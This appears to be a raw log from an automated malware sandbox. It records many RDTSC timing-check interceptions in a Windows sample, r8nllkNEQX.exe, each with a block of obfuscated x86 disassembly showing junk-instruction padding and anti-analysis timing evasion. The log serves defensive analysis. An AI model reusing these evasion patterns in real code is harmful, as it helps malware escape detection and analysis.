Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C04E7 second address: 70C052A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov ebx, 223549D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+08h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FFB28DE2A19h 0x0000001a and cl, 00000036h 0x0000001d jmp 00007FFB28DE2A11h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C052A second address: 70C0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a mov dword ptr [esi+0Ch], eax 0x0000000d jmp 00007FFB28B74679h 0x00000012 mov eax, dword ptr [ebx+4Ch] 0x00000015 jmp 00007FFB28B7466Eh 0x0000001a mov dword ptr [esi+10h], eax 0x0000001d jmp 00007FFB28B74670h 0x00000022 mov eax, dword ptr [ebx+50h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFB28B74677h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0590 second address: 70C0595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0595 second address: 70C05BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFB28B74678h 0x00000014 mov ah, AFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05BF second address: 70C05C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05C5 second address: 70C05E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB28B74671h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05E3 second address: 70C06C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+18h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFB28DE2A0Bh 0x00000014 adc esi, 34612B4Eh 0x0000001a jmp 00007FFB28DE2A19h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FFB28DE2A10h 0x00000026 adc esi, 73E80FC8h 0x0000002c jmp 00007FFB28DE2A0Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+58h] 0x00000036 jmp 00007FFB28DE2A16h 0x0000003b mov dword ptr [esi+1Ch], eax 0x0000003e pushad 0x0000003f mov ax, 2A7Dh 0x00000043 pushfd 0x00000044 jmp 00007FFB28DE2A0Ah 0x00000049 add esi, 3B775558h 0x0000004f jmp 00007FFB28DE2A0Bh 0x00000054 popfd 0x00000055 popad 0x00000056 mov eax, dword ptr [ebx+5Ch] 0x00000059 jmp 00007FFB28DE2A16h 0x0000005e mov dword ptr [esi+20h], eax 0x00000061 jmp 00007FFB28DE2A10h 0x00000066 mov eax, dword ptr [ebx+60h] 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FFB28DE2A0Dh 0x00000071 movzx esi, bx 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C06C3 second address: 70C06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28B7466Eh 0x00000013 adc ax, 8478h 0x00000018 jmp 00007FFB28B7466Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov ecx, 21CB7B45h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C06FD second address: 70C0720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov ch, 72h 0x0000000f popad 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28DE2A0Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0720 second address: 70C0725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0725 second address: 70C0737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+68h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0737 second address: 70C0741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 5772AC77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0741 second address: 70C075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C075B second address: 70C076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C076E second address: 70C07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007FFB28DE2A0Eh 0x00000012 mov word ptr [esi+30h], ax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFB28DE2A0Eh 0x0000001d jmp 00007FFB28DE2A15h 0x00000022 popfd 0x00000023 mov si, AB07h 0x00000027 popad 0x00000028 mov ax, word ptr [ebx+00000088h] 0x0000002f jmp 00007FFB28DE2A0Ah 0x00000034 mov word ptr [esi+32h], ax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFB28DE2A0Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C07EF second address: 70C07F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C07F5 second address: 70C084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 jmp 00007FFB28DE2A12h 0x00000016 mov dword ptr [esi+34h], eax 0x00000019 jmp 00007FFB28DE2A10h 0x0000001e mov eax, dword ptr [ebx+18h] 0x00000021 pushad 0x00000022 jmp 00007FFB28DE2A0Eh 0x00000027 mov di, ax 0x0000002a popad 0x0000002b mov dword ptr [esi+38h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov di, D2ECh 0x00000035 push edx 0x00000036 pop eax 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C084E second address: 70C0865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ax, 3B7Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0865 second address: 70C0885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0885 second address: 70C0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 movsx edi, cx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFB28B74673h 0x00000015 and ah, 0000005Eh 0x00000018 jmp 00007FFB28B74679h 0x0000001d popfd 0x0000001e call 00007FFB28B74670h 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esi+40h], eax 0x0000002a jmp 00007FFB28B74677h 0x0000002f lea eax, dword ptr [ebx+00000080h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFB28B74675h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0910 second address: 70C0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0916 second address: 70C0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0926 second address: 70C092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C092A second address: 70C092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C092E second address: 70C0934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0934 second address: 70C099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFB28B74676h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, 30h 0x00000013 mov dh, al 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 pushad 0x00000019 call 00007FFB28B74671h 0x0000001e pop esi 0x0000001f mov si, bx 0x00000022 popad 0x00000023 push edi 0x00000024 mov dx, ax 0x00000027 pop esi 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c jmp 00007FFB28B7466Bh 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C099D second address: 70C09A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C09A1 second address: 70C09A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C09A7 second address: 70C09E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28DE2A18h 0x00000008 pop eax 0x00000009 jmp 00007FFB28DE2A0Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFB28DE2A14h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A66 second address: 70C0A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A6A second address: 70C0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A70 second address: 70C0A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A76 second address: 70C0A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A7A second address: 70C0A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov esi, 6F3E3DB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A8C second address: 70C0AA6 instructions: 0x00000000 rdtsc 0x00000002 mov si, FE53h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 1BE12CAFh 0x0000000d popad 0x0000000e test edi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, ABh 0x00000015 mov cx, 9F9Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AA6 second address: 70C0AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFB9703326Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, 8Ah 0x00000014 pushfd 0x00000015 jmp 00007FFB28B74674h 0x0000001a sub cx, 0968h 0x0000001f jmp 00007FFB28B7466Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AF1 second address: 70C0AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AF7 second address: 70C0AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AFB second address: 70C0B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e jmp 00007FFB28DE2A16h 0x00000013 mov dword ptr [esi+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushfd 0x0000001c jmp 00007FFB28DE2A13h 0x00000021 xor cx, 8ABEh 0x00000026 jmp 00007FFB28DE2A19h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B61 second address: 70C0B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B71 second address: 70C0B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B89 second address: 70C0BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFB28B74670h 0x0000000a jmp 00007FFB28B74675h 0x0000000f popfd 0x00000010 popad 0x00000011 mov ecx, 0CA443C7h 0x00000016 popad 0x00000017 push 00000001h 0x00000019 jmp 00007FFB28B7466Ah 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0BCE second address: 70C0BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0BD4 second address: 70C0BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C89 second address: 70C0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C8D second address: 70C0C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C93 second address: 70C0CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0CB0 second address: 70C0CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0CB4 second address: 70C0D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007FFB28DE2A13h 0x00000010 push ecx 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 jmp 00007FFB28DE2A15h 0x00000018 popad 0x00000019 test edi, edi 0x0000001b jmp 00007FFB28DE2A0Eh 0x00000020 js 00007FFB972A13C4h 0x00000026 jmp 00007FFB28DE2A10h 0x0000002b mov eax, dword ptr [ebp-04h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FFB28DE2A0Eh 0x00000035 or cx, 7DD8h 0x0000003a jmp 00007FFB28DE2A0Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 movzx ecx, dx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D3A second address: 70C0D4B instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D4B second address: 70C0D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D5A second address: 70C0D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D60 second address: 70C0D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D79 second address: 70C0D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 70h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D80 second address: 70C0DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 83h 0x00000005 pushfd 0x00000006 jmp 00007FFB28DE2A12h 0x0000000b sub ah, FFFFFFF8h 0x0000000e jmp 00007FFB28DE2A0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000001h 0x00000019 jmp 00007FFB28DE2A16h 0x0000001e nop 0x0000001f jmp 00007FFB28DE2A10h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov bl, ah 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0DDC second address: 70C0E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FFB28B7466Eh 0x0000000b xor ax, 18E8h 0x00000010 jmp 00007FFB28B7466Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007FFB28B74676h 0x0000001f lea eax, dword ptr [ebp-18h] 0x00000022 jmp 00007FFB28B74670h 0x00000027 nop 0x00000028 jmp 00007FFB28B74670h 0x0000002d push eax 0x0000002e pushad 0x0000002f movsx edi, ax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0EA8 second address: 70C0EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 36ACF574h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFB28DE2A10h 0x00000018 or cx, D728h 0x0000001d jmp 00007FFB28DE2A0Bh 0x00000022 popfd 0x00000023 mov cx, 541Fh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0EE1 second address: 70C0FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FFB28B74676h 0x00000010 js 00007FFB97032E13h 0x00000016 pushad 0x00000017 mov al, D6h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebp-14h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFB28B74672h 0x00000024 add cx, 1F18h 0x00000029 jmp 00007FFB28B7466Bh 0x0000002e popfd 0x0000002f mov eax, 77B956CFh 0x00000034 popad 0x00000035 mov ecx, esi 0x00000037 jmp 00007FFB28B74672h 0x0000003c mov dword ptr [esi+0Ch], eax 0x0000003f jmp 00007FFB28B74670h 0x00000044 mov edx, 756006ECh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FFB28B7466Dh 0x00000052 and ecx, 342D3A16h 0x00000058 jmp 00007FFB28B74671h 0x0000005d popfd 0x0000005e jmp 00007FFB28B74670h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0FA0 second address: 70C1044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FFB28DE2A0Fh 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 jmp 00007FFB28DE2A16h 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FFB28DE2A0Dh 0x00000021 sub ax, 8E36h 0x00000026 jmp 00007FFB28DE2A11h 0x0000002b popfd 0x0000002c popad 0x0000002d test eax, eax 0x0000002f jmp 00007FFB28DE2A0Eh 0x00000034 jne 00007FFB972A10D0h 0x0000003a jmp 00007FFB28DE2A10h 0x0000003f mov edx, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFB28DE2A17h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1044 second address: 70C108F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b pushad 0x0000000c mov esi, 4860A573h 0x00000011 popad 0x00000012 mov dword ptr [edx], eax 0x00000014 jmp 00007FFB28B74672h 0x00000019 mov eax, dword ptr [esi+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FFB28B7466Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C108F second address: 70C109E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C109E second address: 70C10B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C10B6 second address: 70C10FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e jmp 00007FFB28DE2A16h 0x00000013 mov eax, dword ptr [esi+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFB28DE2A17h 0x0000001d rdtsc
